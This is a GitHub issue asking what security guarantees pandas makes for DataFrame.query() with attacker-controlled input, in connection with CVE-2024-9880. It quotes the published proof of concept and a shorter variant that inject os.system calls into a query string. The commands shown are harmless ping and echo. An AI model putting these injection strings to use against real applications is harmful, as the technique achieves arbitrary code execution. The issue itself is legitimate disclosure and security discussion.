Description
Research
-
I have searched the [pandas] tag on StackOverflow for similar questions.
-
I have asked my usage related question on StackOverflow.
Link to question on StackOverflow
(To clarify, this question was written by another user.)
Question about pandas
Hi, I saw this question on StackOverflow, which is about a public CVE, CVE-2024-9880.
The basic premise of the CVE is that if an attacker controls the expr
argument to DataFrame.query(), then arbitrary code execution can be achieved.
The example given in the CVE is
import pandas as pd
df = pd.DataFrame({'a': [1, 2, 3], 'b': ['error_details', 'confidential_info', 'normal']})
query = '@pd.core.frame.com.builtins.__import__("os").system("""ping google.com #""")'
try:
engine = "python"
result = df.query(query,local_dict={},engine="python",).index
except Exception as e:
print(f'Error: {e}')
However, this is not minimal, and a more minimal construction would be
import pandas as pd
df = pd.DataFrame()
expr = '@pd.compat.os.system("""echo foo""")'
result = df.query(expr, engine='python')
(The report also says that engine='python'
is required, but both engine='python'
and engine='numexpr'
worked in my testing.)
My question is about Pandas's security model. What security guarantees does Pandas make about DataFrame.query() with an attacker-controlled expr
?
My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.